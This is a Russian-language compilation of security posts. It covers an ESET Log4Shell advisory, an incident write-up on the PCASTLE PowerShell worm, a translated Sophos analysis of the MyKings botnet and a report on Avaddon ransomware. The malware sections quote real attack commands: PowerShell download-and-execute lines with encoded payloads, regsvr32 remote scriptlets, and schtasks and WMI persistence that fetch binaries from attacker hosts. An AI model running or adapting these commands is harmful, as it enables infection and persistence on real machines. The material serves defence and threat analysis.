[SIZE=14pt]Сведения об оповещении[/SIZE]

10 декабря ESET начала исследование уязвимости в служебной программе Log4j 2 (CVE-2021-44228). Эта уязвимость может позволить злоумышленнику удаленно выполнить код.

Подробнее об уязвимости читайте в нашей [URL=https://www.welivesecurity.com/2021/12/13/log4shell-vulnerability-what-we-know-so-far/]статье WeLiveSecurity.[/URL]

Команды инженеров ESET круглосуточно работают над выявлением, исправлением и защитой любых потенциально уязвимых систем. В настоящее время нам не известно о кражах данных.

Шаги по смягчению:[URL=https://www.welivesecurity.com/2021/12/13/log4shell-vulnerability-what-we-know-so-far/#Mitigationsteps] следуйте инструкциям в статье WeLiveSecurity Уязвимость Log4Shell[/URL]: что нам известно на данный момент.

Пользователи ESET Secure Authentication (ESA): пока не будет выпущено исправление для автоматического решения проблемы, обновляйте экземпляр Elasticsearch вручную.

Пользователи ESET Enterprise Inspector (EEI): пользователи [URL=https://support.eset.com/en/kb8192-add-detection-rules-in-eset-enterprise-inspector-for-log4j-2-vulnerability]могут добавлять правила обнаружения в EEI[/URL] для обнаружения Log4j.

Список продуктов ESET, которые могут защитить вашу систему или сеть

С 11 декабря функция защиты от сетевых атак в продуктах безопасности ESET для Windows была обновлена для обнаружения эксплойтов уязвимости. ESET блокирует попытки атак с 14:24 по центральноевропейскому времени того же дня.

Следующие продукты ESET способны обнаруживать и блокировать потенциальную атаку на вашу систему или сеть. Если вы используете более раннюю версию продукта безопасности ESET, мы рекомендуем обновить продукт ESET до последней версии.

  [QUOTE] Продукты для бизнеса: ESET Endpoint Antivirus, ESET Endpoint Security и все продукты ESET Server Security [B][B]версии 7.0 и новее.[/B][/B]
    Потребительские продукты: ESET Internet Security, ESET Smart Security и ESET Smart Security Premium [B]версии 6.0 и более поздних.[/B] [/QUOTE]

[IMG WIDTH=415 HEIGHT=247]https://support.eset.com/storage/IMAGES/en/KB8818/KB8818Fig0.png[/IMG]

Список продуктов ESET, подтвержденных как защищенные от уязвимости Log4j 2

По состоянию на 15 декабря продукты ESET, перечисленные ниже, были проверены и подтверждены, что они не подвержены уязвимости Log4j 2. Это означает, что следующие продукты нельзя использовать для удаленного выполнения кода.

    Локальные продукты:

ESET PROTECT
ESET Security Management Center
ESET Remote Administrator
ESET Enterprise Inspector
ESET NOD32 Antivirus/Internet Security/Smart Security Premium for Windows
ESET Endpoint Antivirus/Endpoint Security for Windows
ESET Server Security for Microsoft Windows Server (former ESET File Security for Microsoft Windows Server)
ESET Security for Microsoft SharePoint Server
ESET Mail Security for Exchange
ESET Mail Security for IBM Domino (former ESET Mail Security for IBM Lotus Domino)
ESET Mobile Security for Android
ESET Parental Control for Android
ESET HOME - Mobile Apps
ESET Server Security for Linux (former ESET File Security for Linux)
ESET Security for Kerio
ESET Endpoint Antivirus for Linux
ESET Virtualization Security for VMware NSX
ESET Mail/File/Gateway Security for Linux/BSD v4.5
ESET NOD32 Antivirus for Linux v4 (Home and Business Edition)
ESET Endpoint Antivirus/Endpoint Security for macOS
ESET Cyber Security/Cyber Security Pro
DEM for ConnectWise Automate
DEM for (Solarwinds) N-able
DEM for (Solarwinds) RMM
DEM for NinjaOne
DEM for Datto
PSA Plugins

Облачные продукты:

ESET PROTECT Cloud (former ESET Cloud Administrator)
ESET Enterprise Inspector Cloud
ESET Cloud Office Security
RMM for Kaseya
ESET Secure Authentication Cloud

Продукты для шифрования:

ESET Endpoint Encryption
ESET Endpoint Encryption for macOS
ESET Endpoint Encryption Server
ESET Full Disk Encryption
ESET Full Disk Encryption for macOS

Порталы:

ESET Business Accounts
ESET MSP Administrator
ESET License Administrator
ESET HOME

Инструменты / Другое:

ESET Shared Local Cache
Rogue Detection Sensor
Remote Deployment Tool

https://support.eset.com/en/alert8188-information-regarding-the-log4j2-vulnerability

Исследователи продемонстрировали, что отпечатки пальцев можно клонировать для биометрической аутентификации всего за 5 долларов без использования каких-либо сложных или необычных инструментов.

Хотя биометрическая аутентификация на основе отпечатков пальцев обычно считается более безопасной по сравнению с PIN-кодами и паролями, тот факт, что отпечатки могут быть оставлены во многих общественных местах, делает ее подходящей для злоупотреблений.

Ранее было доказано, что есть способы собирать и использовать отпечатки пальцев людей, чтобы обмануть даже самые сложные датчики. Однако это обычно связано с использованием нишевых инструментов, таких как цифровые зеркальные камеры и высококачественные 3D-принтеры.

Если бы только существовал дешевый способ получить эти отпечатки и преобразовать их в пригодные для использования отпечатки пальцев, это серьезно и негативно повлияло бы на безопасность этого конкретного метода аутентификации.

По словам команды Kraken Security Labs, есть способ клонировать отпечатки пальцев с использованием недорогих материалов без использования высокопроизводительных инструментов на любом этапе процесса.

https://www.bleepingcomputer.com/news/security/biometric-auth-bypassed-using-fingerprint-photo-printer-and-glue/

В одной из задач по очистке заражений в локальной сети столкнулись с периодическим запуском в системе powershell, и детектированием вредоносного действия установленным антивирусом. однако в логи антивируса указывается только powershell.exe и целевой адрес. Поскольку процессы запуска системе были кратковременными в образ автозапуска данное событие было зафиксировано лишь через отслеживание процессов и задач без учета цели и cmdline.

   [QUOTE]Полное имя C:\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
   Имя файла POWERSHELL.EXE
   Цифр. подпись Действительна, подписано Microsoft Windows
   Оригинальное имя PowerShell.EXE.MUI
   Версия файла 6.3.9600.17396 (winblue_r4.141007-2030)
   Описание Windows PowerShell
   Производитель Microsoft Corporation

   Доп. информация на момент обновления списка
   pid = 5100 NT AUTHORITY\СИСТЕМА
   Процесс создан 08:20:00 [2021.09.14]
   Процесс завершен 08:20:01 [2021.09.14]
   parentid = 492 C:\WINDOWS\SYSTEM32\SVCHOST.EXE
   pid = 4724 NT AUTHORITY\СИСТЕМА
   Процесс создан 08:20:00 [2021.09.14]
   Процесс завершен 08:20:00 [2021.09.14]
   parentid = 492 C:\WINDOWS\SYSTEM32\SVCHOST.EXE
   pid = 5496 NT AUTHORITY\СИСТЕМА
   Процесс создан 08:10:00 [2021.09.14]
   Процесс завершен 08:10:01 [2021.09.14]
   parentid = 492 C:\WINDOWS\SYSTEM32\SVCHOST.EXE[/QUOTE]


после включение записи лога DNS стали известны целевые адреса:

[QUOTE] T[.]ZER2[.]COM, V[.]Y6H[.]NET[/QUOTE]

далее, [B]разработчик uVS добавил функцию обнаружения cmdline по закрытым процессам[/B] и картина атаки резко прояснилась - было зафиксировано через powershell два варианта запуска:

[QUOTE]C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -nop -ep bypass -c "IEX(New-Object System.Net.WebClient).DownloadString(\"http://t[.]zer2[.]com/ipc.jsp?h\")"[/QUOTE]

и

[QUOTE]C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdwBtAD8AcwBtAGIAJwApAA==[/QUOTE]

[IMG WIDTH=1176 HEIGHT=405]https://chklst.ru/uploads/editor/z2/2rl2adkha8u7.jpg[/IMG]

после декодирования строки:

[QUOTE]IEX (New-Object Net.WebClient).downloadstring('http://v[.]beahh[.]com/wm?smb')[/QUOTE]

собственно, именно данный целевой адрес и детектировал антивирус:
[QUOTE]10.09.2021 12:00:04 http[:]//v[.]beahh[.]com/wm?smb Blocked by internal blacklist C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe NT AUTHORITY\СИСТЕМА 72.52.178.23 9F1E24917EF96BBB339F4E2A226ACAFD1009F47B[/QUOTE]

родительский процесс (здесь 432) для процессов запуска powershell с указанным cmdline

[IMG WIDTH=722 HEIGHT=265]https://chklst.ru/uploads/editor/p9/psquwezo61py.jpg[/IMG]

поиск по известному cmdline позволил определить тип ([URL=https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/Trojan.PS1.PCASTLE.AF/]Trojan.PS1.PCASTLE[/URL]) и дополнительные детали вредоносного ПО, который распространился в сети:

   The following {Task Name} - {Task to be run} listed should be used in the steps identified below:

[QUOTE] \\\Rtsa - powershell -nop -ep bypass -e {Base64 Encoded String}
   \\\Rtsa - powershell -nop -ep bypass -c ''IEX(New-Object System.Net.WebClient).DownloadString(\\\"http[:]//t[.]zer2[.]com/ipc.jsp?h\\\")''[/QUOTE]

и

   "More advanced options" option to include all hidden files and folders in the search result.

[QUOTE] %Application Data%\sign.txt
   %Application Data%\flashplayer.tmp
   %User Startup%\run.bat
   %User Startup%\FlashPlayer.lnk
[/QUOTE]

данные файлы были найдены в карантине антивируса:

[QUOTE] 7F450F8583BA949317E8FA47E1B745CEC6CE242E.NDF "C:\Users\***\AppData\Roaming\flashplayer.tmp";"C:\Users\****\AppData\Roaming\flashplayer.tmp" "@NAME=PowerShell/TrojanDownloader.Agent.DV@TYPE=Trojan@SUSP=inf" ****** 221 bytes

   896C398162D9175E7B6736DE39710ED8385C9DC2.NDF "c:\users\***\appdata\roaming\microsoft\windows\start menu\programs\startup\flashplayer.lnk";"C:\users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk";"C:\users\****\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk" "@NAME=LNK/Agent.GY@TYPE=Trojan@SUSP=inf" 774 bytes

   A33C1553998CCC0B1FF1F2A91BBB1A53B686AC13.NDF "C:\Windows\System32\Tasks\Rtsa" "@NAME=PowerShell/TrojanDownloader.Agent.CEJ@TYPE=Trojan@SUSP=inf" **** 2066 bytes[/QUOTE]


некоторые детали данного червя

некоторые детали:
URLs used by updated worms for infection

http[:]//w.beahh.com/page.html
http[:]//v.beahh.com/

PowerShell URLs:
Note that these are URL fragments, and more information is usually encoded in the query string.

http[:]//v.y6h.net/g
http[:]//v.bddp.net/v
http[:]//v.bddp.net/wm

Domains
Some domains have many subdomains.
For this reason, we will use a wildcard in place of the subdomain, as the entire domain is attacker-controlled.

*.beahh[.]com
*.bddp[.]net
v.y6h[.]net
*.zer2[.]com
Scheduled task names:
\Microsoft\Windows\

   Task: {36DAD069-B5EB-4EE4-A085-CB9540ED7B30} - \Microsoft\windows\Rass -> Нет файла <==== ВНИМАНИЕ


Filenames:
%APPDATA%\sign.txt
%APPDATA%\flashplayer.tmp
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk

Listening ports:
65530
65531
65532
65533

TCP traffic on ports:
This will appear as open port checks (TCP SYN packet, followed either by a TCP RST from the target machine, or a 3-way handshake followed by a graceful shutdown)
65530
65531
65532
65533

Firewall rules:
DNS (allow TCP port 65531)
DNSS2 (allow TCP port 65531)
DNS2 (allow TCP port 65532)
DNSsql (allow TCP port 65533)
DNSd (allow TCP port 65533)
DNSS3 (allow TCP port 65533)

User accountsWindows user account: “k8h3d”, password “k8d3j9SjfS7”
SQL Server account: “sa”, password “ksa8hd4,m@~#$%^&*()”(Note: “sa” is a legitimate account, but the password above is not.)


детальное описание червя-майнера c использованием экспойтов АНБ PS1.PCASTLE от BitDefender
[URL=https://www.bitdefender.com/files/News/CaseStudies/study/280/Bitdefender-WhitePaper-Worm-Cryptominer-Beapy-PCASTLE.pdf][B]здесь[/B][/URL]

[IMG WIDTH=1600 HEIGHT=900]https://www.bleepstatic.com/content/hl-images/2021/09/06/Chainsaw.jpg[/IMG]

У специалистов по реагированию на инциденты есть новый инструмент под названием Chainsaw, который ускоряет поиск в записях журнала событий Windows для выявления угроз.

Инструмент предназначен для оказания помощи на этапе первого реагирования при взаимодействии с безопасностью, а также может помочь отсортировать записи, имеющие отношение к расследованию.
Создан для специалистов по реагированию на инциденты

Журналы событий Windows - это реестр действий системы, содержащий сведения о приложениях и логинах пользователей.

Сложность проверки этих записей заключается в том, что их много, особенно в системах с высоким уровнем ведения журнала; поиск нужной информации может и может быть трудоемкой задачей.

Созданная Джеймсом Д., ведущим специалистом по поиску угроз в подразделении Countercept F-Secure, Chainsaw - это утилита командной строки на основе Rust, которая может просматривать журналы событий и выделять подозрительные записи или строки, которые могут указывать на угрозу.

Инструмент использует логику обнаружения Sigma rule для быстрого поиска журналов событий, имеющих отношение к расследованию.

«Chainsaw также содержит встроенную логику для обнаружения вариантов использования, которые не подходят для правил Sigma, и предоставляет простой интерфейс для поиска в журналах событий по ключевому слову, шаблону регулярного выражения или по конкретным идентификаторам событий».

F-Secure заявляет, что Chainsaw специально разработан для быстрого анализа журналов событий в средах, где решение для обнаружения и реагирования (EDR) отсутствовало во время взлома.

В таких случаях специалисты, реагирующие на инциденты могут использовать функции поиска Chainsaw для извлечения из журналов Windows информации, относящейся к вредоносной деятельности.

Пользователи могут использовать этот инструмент для следующих действий:

Поиск в журналах событий по идентификатору события, ключевому слову и шаблонам регулярных выражений
Извлечение и анализ предупреждений Защитника Windows, F-Secure, Sophos и Kaspersky AV.
Обнаружение очистки журналов ключевых событий или остановки службы журнала событий
Обнаружение пользователей, которые создаются или добавляются в конфиденциальные группы пользователей
Брутфорс локальных учетных записей пользователей
Логины RDP, сетевые логины и т. д.

Chainsaw, доступный как инструмент с открытым исходным кодом, использует библиотеку синтаксического анализатора EVTX и логику обнаружения, обеспечиваемую библиотекой TAU Engine от F-Secure Countercept. Он может выводить результаты в таблице ASCII, CSV или JSON.

https://www.bleepingcomputer.com/news/security/new-chainsaw-tool-helps-ir-teams-analyze-windows-event-logs/

https://github.com/countercept/chainsaw/releases/download/v1.0.2/chainsaw_x86_64-pc-windows-msvc.zip

[B]SophosLab[/B] ранее опубликовал детальный отчет о работе ботнета Mykings, который возможно и стоит за многими атаками на системы с использованием EternalBlue NSA exploit, инструментария WMI для обновления и экплуатации систем с целью майнинга криптовалют, буткита для закрепления устойчивой работы бэкдора и майнеров и др.

[B]MyKings: медленный, но неустанный рост ботнета
[/B]
   Ботнет [B]MyKings[/B] имеет широкую ряд автоматизированных методов взлома серверы - все для установки майнера криптовалюты.

Вступление

Ботнет [B]MyKings / DarkCloud / Smominru[/B] (который мы будем называть MyKings) был активен в течение двух лет. Хотя отдельные модули были описаны в нескольких публикациях, в прошлом эта статья не фокусировалась на глубоком анализе отдельных используемых вредоносных компонентов. во время активности. Здесь мы смотрим на взаимодействие между различными элементами инструментов, используемыми злоумышленников MyKings и их роли в процессе заражения, чтобы получить полную картину работа ботнета. Ботнет обычно доставляет криптомайнеры и трояны удаленного доступа (RAT). Недавно злоумышленники, стоящие за MyKings, добавили функциональность буткита, чтобы избежать обнаружения и установить постоянство это трудно удалить или смягчить. Самая ранняя активность MyKings датируется 2016 годом, и с тех пор она активна, но мы обнаружили некоторые пересекаются в образцах и серверной инфраструктуре с более ранней кампанией.

Основные выводы этого исследования заключаются в следующем:

* Ботнет распространяется путем атаки на слабые комбинации имени пользователя и пароля в MySQL, MSSQL, telnet, ssh, IPC, WMI, RDP, а также дополнительно использует EternalBlue для бокового движения.

* Во время начальных процессов заражения ботнет защищает компьютер; удаляет процессы, файлы и настройки, принадлежащие семействам вредоносных программ, управляемые другими угрозами актеры; и закрывает коммуникационные порты, которые могут быть использованы для повторного заражения компьютера.

Злоумышленники, стоящие за этим ботнетом, предпочитают использовать открытый исходный код или другое доступное ПО и обладают достаточными навыками, чтобы вносить изменения и улучшения в исходный код.

Основными целями ботнета являются страны Азии, но мы можем найти инфекции повсюду.

В число наиболее инфицированных стран входили:

* Китай * Тайвань * Россия * Бразилия * США * Индия * Япония

Процесс заражения

Компоненты ботнета очень взаимосвязаны, и существует множество возможных путей или способв заражений.

ok.exe - установщик буткита Ботнет MyKings начал интенсивно использовать компоненты буткита в начале 2019 года. Однако первые версии установщика буткита датируются июнем 2018 г.

Наиболее распространенный вариант попадал в зараженные системы с именами файлов ok.exe или max.exe.

Установщики буткитов обычно защищены с помощью VMProtect, что делает более сложным точный анализ.

Это характерно для ботнета: есть несколько компонентов, каждый из которых они делают очень похожую процедуру самообновления. Таким образом, даже если большинство компонентов ботнет удаляется с компьютера, остальные имеют возможность восстановить его до полной силы.

Он выполняет поиск в списке запущенных процессов и завершает те, которые связаны с продуктами безопасности, используя жестко запрограммированный список имен.

c3.bat - это компонент, который завершает процесс заражения. Это относительно большой командный файл; В размер варьируется, но обычно он составляет от 3 000 до 20 000 байт. Он запускает несколько десятков процессов по мере выполнения своей задачи - загрузки обновлений, установки. компоненты, устанавливая стойкость и очищая все следы, которые были созданы во время начальный процесс заражения. Это наиболее часто используемый компонент кампаний, было несколько десятков его вариантов. обнаружено, что они отличались в незначительных деталях, таких как список уничтожения или имена учетных записей пользователей. Обычно он устанавливается из самораспаковывающихся архивов RAR, содержащих два файла, n.vbs и c3.bat.

Криптомайнинг - ресурсоемкий процесс, на компьютере есть место только для одного. MyKings пытается убедиться, что ему не нужно делить драгоценный процессор с другими майнерами - даже если они дружеские. Многие имена процессов используются более старыми версиями ботнета MyKings, поэтому этот механизм также может служить частью процесса обновления. Обратите внимание, что более старые версии майнеров, вероятно, использовали более старые (и уже заблокированы) идентификаторы кошельков, которые бесполезны. Список убитых процессов со временем менялся

Некоторые имена используются чаще, другие могут быть связаны с конкретными угрозами, например:

[QUOTE] doc001.exe (майнер XMRig)
   docv8.exe (майнер XMRig)
   wodCmdTerm.exe (майнер XMRig)
   NsCpuCNMiner64.exe (CNMiner)
   tlscntr.exe (майнер XMRig)
   ctfmonc.exe (майнер XMRig)
   wuauser.exe (майнер XMRig)
   mscsuscr.exe (майнер XMRig)
   Pviunc.exe (майнер XMRig)
   Bllianc.exe (майнер XMRig)
   dether.exe (майнер XMRig)
[/QUOTE]

Правила межсетевого экрана

Пакетный файл изменяет правила брандмауэра. Цель состоит в том, чтобы закрыть порты, которые использовались для первоначального инфекции или могут быть использованы для последующих инфекций. Таким образом ботнет защищает себя от враждебных захват, обезопасив зараженный компьютер. Он создает новые правила брандмауэра, которые блокируют доступ к зараженному компьютеру на портах 135, 137, 138, 139 и 445 (относится к таким службам, как RPC, NetBIOS и Active Directory). Это закрывает возможность повторное заражение с помощью эксплойта RDP или EternalBlue.

Обновление компонентов

Скрипт скачивает с сайтов обновлений ряд различных скриптов, например:

[QUOTE] powershell.exe IEX (New-Object
   system.Net.WebClient).DownloadString('hxxp://wmi.1217bye[.]host/S.ps1')&powershell.exe IEX
   (New-Object
   system.Net.WebClient).DownloadString('hxxp://173.208.139[.]170/s.txt')&powershell.exe IEX
   (New-Object system.Net.WebClient).DownloadString('hxxp://35.182.171[.]137/s.jpg')||regsvr32 /u
   /s /i:hxxp://wmi.1217bye[.]host/1.txt scrobj.dll®svr32 /u /s
   /i:hxxp://173.208.139[.]170/2.txt scrobj.dll®svr32 /u /s /i:hxxp://35.182.171[.]137/3.txt
   scrobj.dll"[/QUOTE]

Роль загружаемых файлов следующая:
• s.ps1: завершает все процессы svchost.exe и conhost.exe, которые не выполняются из системный каталог и выполняет c: \ windows \ temp \ conhost.exe
• s.txt: скрипт сбора информации
• s.jpg: убивает процессы, связанные с майнером, и определяет правила брандмауэра.
• 1.txt: загружает компоненты PE (обычно установщик буткита и дроппер c3.bat).
• 2.txt: список URL-адресов для компонентов.

Загружается несколько различных компонентов, и используются несколько методов сохранения, чтобы убедиться, что буткит переживает перезагрузку на компьютере

Устойчивость

Пакетный сценарий использует несколько различных методов для достижения устойчивости и выживаемости после загрузки системы

Буткит

Компонент буткита - это первый из методов сохранения. Поскольку в IPL перезаписывается вредоносный код, он будет выполняться при каждой перезагрузке, а также загружает и запускает компоненты ботнета.

Ключи автозапуска в реестре

В дополнение к этому пакетный файл создает ключ автозапуска реестра, который использует regsvr32.exe для извлечения и выполнения обновления, в данном случае v.sct, который представляет собой простой скриптлет, загружающий компоненты Win32.

 [QUOTE] reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "start" /d
   "regsvr32 /u /s /i:hxxp://js.1226bye[.]xyz:280/v.sct scrobj.dll" /f

   reg add "HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\­Run" /v
   "start" /d "regsvr32 /u /s /i:hxxp://js.1226bye[.]xyz:280/v.sct scrobj.dll" /f[/QUOTE]



Задачи по расписанию

Некоторые компоненты прописаны в отдельную задачу. Названия задач обычно:
ok, Mysa, Mysa1, Mysa2 и Mysa3.

Запланированные задачи выполняются при запуске системы с помощью командной строки, которая подключается к ftp-серверу. и скачивает обновление, в случае задачи Mysa исполняемый файл будет сохранен как a.exe

 [QUOTE] schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.1226bye[.]xyz>s&echo
   test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo
   bye>>s&ftp -s:s&c:\windows\update.exe" /ru "system" /sc onstart /F

   schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.1226bye[.]xyz>p&echo
   test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp
   -s:p" /ru "system" /sc onstart /F

   schtasks /create /tn "Mysa3" /tr "cmd /c echo open ftp.1226bye[.]xyz>ps&echo
   test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo
   bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe" /ru "system" /sc onstart /F[/QUOTE]

Запланированные задачи обычно загружают дополнительные компоненты через ftp-соединение, в данном конкретном случае. бэкдор Forshare и майнер.

Затем другой набор задач запускает загруженный файл ok.dat, который является файлом DLL Windows, поэтому сценарий выполняет экспорт ServiceMain с параметром aaaa. Этот компонент является бэкдором PCShare.
[QUOTE]
   schtasks / create / tn "Mysa1" / tr "rundll32.exe c: \ windows \ debug \ item.dat, ServiceMain aaaa "/ ru" system "/ sc onstart / F schtasks / create / tn "ok" / tr "rundll32.exe c: \ windows \ debug \ ok.dat, ServiceMain aaaa "/ ru" система "/ sc onstart / F[/QUOTE]



сценарии WMI

Третий метод использует фильтры WMI для установления исполнения.

c3.bat сначала удаляет следующие сценарии событий WMI, созданные более ранней версией ботнета:

[QUOTE] • fuckyoumm2_filter
   • fuckyoumm2_consumer
   • fuckayoumm3
   • fuckayoumm4
   • Windows Events Consumer
   • Windows Events Consumer4
   • Windows Events Filter[/QUOTE]


Затем регистрирует новый фильтр с именем fuckyoumm4, который выполняется каждые 3 часа (10800 секунд).

  [QUOTE] wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3",
   EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM
   __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA
   'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\\root\subscription"
   PATH CommandLineEventConsumer CREATE Name="fuckyoumm4",
   CommandLineTemplate="cmd /c powershell.exe -nop -enc
   \"JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALg­BOAGUAdAAuAFcAZQBiA
   EMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAa­QBuAGcAKAAnAGgAdAB0
   AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIA­LgB0AHgAdAAnACkALgB
   0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACc­AfAAlAHsAJABuAD0AJA
   BfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG­8AdwBuAGwAbwBhAGQAR
   gBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9A­A==\"&powershell.ex
   e IEX (New-Object
   system.Net.WebClient).DownloadString('hxxp://wmi.1217bye[.]host/S.ps1')&powersh
   ell.exe IEX (New-Object
   system.Net.WebClient).DownloadString('hxxp://173.208.139[.]170/s.txt')&powershe
   ll.exe IEX (New-Object
   system.Net.WebClient).DownloadString('hxxp://35.182.171[.]137/s.jpg')||regsvr32
   /u /s /i:hxxp://wmi.1217bye[.]host/1.txt scrobj.dll®svr32 /u /s
   /i:hxxp://173.208.139[.]170/2.txt scrobj.dll®svr32 /u /s
   /i:hxxp://35.182.171[.]137/3.txt scrobj.dll"&wmic
   /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE
   Filter="__EventFilter.Name=\"fuckyoumm3\"",
   Consumer="CommandLineEventConsumer.Name=\"fuckyoumm4\""
[/QUOTE]

Это код события - зашифрованная команда PowerShell, которая загружает текстовый файл с URL-адреса.

  [QUOTE] hxxp: //wmi.1217bye [.] host / 2.txt (URL-адрес может со временем измениться).

   $wc=New-Object
   System.Net.WebClient;$wc.DownloadString('hxxp://wmi.1217bye[.]host/2.txt').trim(
   ) -split '[\r\n]+'|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);start $n;}
[/QUOTE]
Содержимое этого файла должно содержать список URL-адресов следующего этапа, которые загружаются и выполнен. Пример содержимого файла 2.txt был следующим:

 [QUOTE] hxxp://173.247.239[.]186/ok.exe
   hxxp://173.247.239[.]186/upsupx.exe
   hxxp://173.247.239[.]186/u.exe[/QUOTE]

Дополнительные три команды в сценарии WMI загружают еще три компонента:

  [QUOTE] hxxp://173.208.139[.]170/s.txt
   hxxp://35.182.171[.]137/s.jpg
   hxxp://wmi.1217bye[.]host/S.ps1[/QUOTE]

Здесь s.txt - это сценарий PowerShell, который загружает файл списка уничтожения из hxxp: //139.5.177 [.] 19 / l.txt.

Этот файл содержит список имен процессов; сценарий останавливает каждый процесс в этом списке:

 [QUOTE] lsmose.exe,C:\Windows\debug\lsmose.exe,1
   lsmos.exe,C:\Windows\debug\lsmos.exe,1
   lsmo.exe,C:\Windows\debug\lsmo.exe,1
   csrw.exe,C:\Program Files (x86)\Common Files\csrw.exe,119
   csrw.exe,C:\Program Files\Common Files\csrw.exe,1
   lsmosee.exe,c:\windows\help\lsmosee.exe,1
   csrs.exe,c:\csrs.exe,1[/QUOTE]


В завершение c3.bat загружает и выполняет s.txt. Это извлекает список уничтожения и останавливает процессы указанный в нем, а также дополнительно загружает и выполняет сценарий с именем up.txt. Это сценарий сбора информации, который собирает системную информацию (включая пароли, использующие Powerkatz) и загружает его на ftp-сервер 192.187.111.66, который был активным сервером сбора. на момент написания этого документа.

[URL=https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophoslabs-uncut-mykings-report.pdf]полный отчет здесь[/URL]

[B]Резюме:[/B]

11 июня 2021 года программа-вымогатель [B]Avaddon[/B], ответственная за многочисленные киберинциденты с 2020 года, приняла решение не только приостановить свои операции, но и предоставить ключи дешифрования всем жертвам, которые стали их целью.

Компания AdvIntel смогла добиться прозрачности виктимологии Avaddon, получив информацию об их мастер-ключе. Такая видимость всех жертв группы (а не только компаний, данные которых были официально размещены в блоге позора Аваддона) позволила получить уникальное представление о шаблонах, стратегиях и методах Авадона.

[B]В ходе расследования виктимологии компания AdvIntel установила, что общий доход, полученный одним оператором за год деятельности Avaddon, потенциально может равняться 1 000 медианной заработной платы в России, что объясняет основу выкупа и то, почему она привлекает все больше и больше талантливых людей в разных странах.
[/B]
Согласно выводам AdvIntel, полученным в результате исчерпывающих расследований сообщества злоумышленников, гибель Avaddon, вероятно, была вызвана политическими причинами - резкой реакцией администрации президента США на недавние атаки программ-вымогателей и последующим давлением со стороны российских правоохранительных органов.

Введение - Затерянная Империя

Трехбуквенный еврейский корень «авад» (אבד), от которого произошло имя Аваддон, имеет два основных семантических толкования - [B]«разрушать» и «терять / теряться»[/B]. Действительно, эти два значения идеально определяют программу-вымогатель Avaddon - разрушительную и вредоносную силу, которой всегда удавалось скрыться и исчезнуть.

Сегодня мы проливаем свет на эту затерянную и скрытую преступную империю, используя уникальные наборы данных - полный список жертв Avaddon, когда-либо подвергавшихся нападениям группы за год ее существования, - обнаруженных AdvIntel. Эти уникальные данные SIGINT подтверждаются эксклюзивными выводами HUMINT - заявлениями, сделанными лидерами подпольного киберсообщества Восточной Европы, которые работали с Avaddon, - объясняя и интерпретируя быстрый рост и еще более быстрое падение групп.

11 июня 2021 года Avaddon выпустила ключи для более чем 2000 жертв, содержащие точные имена компаний-нарушителей.

Наш анализ подтвержденной виктимологии показывает, что некоторые из них были ведущими мировыми компаниями. Как этой группе удалось за год поразить такое количество компаний? Ответ: Avaddon создал вокруг себя целую экосистему - сеть цепочек поставок, международных филиалов, продавцов, менеджеров подпольных аукционов и переговорщиков. Они создали органическую экосистему экономики криминального вымогательства - форму «выкупа».

Конечно, Avaddon была не единственной группой, придерживавшейся диверсифицированного подхода к построению более крупной бизнес-системы. Однако, вероятно, они были самыми креативными. Они были единственной группой, которая позволяла международным партнерам присоединяться к команде в качестве аффилированных лиц, которые непосредственно освещали атаки Avaddon на пяти континентах, но способствовали их продвижению.

Одна из крупнейших атак Avaddon - на крупное финансовое учреждение, произошедшая в мае 2021 года - иллюстрирует этот комплексный подход к построению экономики атак с использованием программ-вымогателей.

Операции Avaddon ориентированы на компании и правительства по всему миру, за исключением России.

   [QUOTE]Во время исследования атаки мы обнаружили 141 уникальный индикатор компрометации RDP для домена жертвы. Это означает, что Avaddon использовал услуги группы перебора RDP... Другими словами, до того, как Avaddon выполнил операцию по краже данных, они могли использовать весь объем подпольных сервисов и приобрести полный набор - доступ по протоколу RDP, прямой доступ к сети и вредоносное ПО для кражи данных.[/QUOTE]

Виктимология - ключ к пониманию противника

Этот новаторский подход позволил Avaddon выполнить несколько тысяч атак.

